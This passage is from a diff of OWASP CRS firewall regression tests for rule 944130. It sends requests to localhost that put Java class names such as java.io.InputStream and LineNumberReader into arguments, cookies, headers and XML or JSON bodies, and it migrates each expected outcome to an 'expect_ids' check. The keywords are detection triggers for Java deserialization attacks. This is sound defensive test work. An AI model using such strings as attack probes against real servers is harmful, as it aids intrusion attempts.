"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-147 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: 
+ expect_ids: [944130] + - test_id: 147 desc: "Cookie name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-148 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 148 desc: "Request header test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-149 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 149 desc: "XML attribute value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-150 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 150 desc: "XML element value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-151 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 151 desc: "Nested XML element value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-152 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 152 desc: "Content-Type text/plain includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-153 + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 153 desc: "Content-Type application/json arg value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-154 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 154 desc: "Content-Type application/json arg name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - 
version: "HTTP/1.0" - data: "{\"java.io.InputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-155 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.InputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 155 desc: "Argument test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-156 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 156 desc: "Argument name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-157 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader=test" + output: + log: + expect_ids: [944130] + - test_id: 157 desc: "Cookie test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStreamReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-158 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStreamReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: 
[944130] + - test_id: 158 desc: "Cookie name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStreamReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-159 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStreamReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 159 desc: "Request header test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStreamReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-160 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStreamReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 160 desc: "XML attribute value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-161 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 161 desc: "XML element value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-162 + 
- input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 162 desc: "Nested XML element value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-163 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 163 desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-164 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 164 desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStreamReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-165 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStreamReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 165 desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.InputStreamReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-166 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.InputStreamReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 166 desc: "Argument test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-167 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 167 desc: "Argument name includes 
keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-168 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader=test" + output: + log: + expect_ids: [944130] + - test_id: 168 desc: "Cookie test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.LineNumberReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-169 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: test=java.io.LineNumberReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 169 desc: "Cookie name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.LineNumberReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-170 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.LineNumberReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 170 desc: "Request header test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.LineNumberReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-171 + - input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.LineNumberReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 171 desc: "XML attribute value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-172 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 172 desc: "XML element value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-173 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 173 desc: "Nested XML element value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-174 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 174 desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 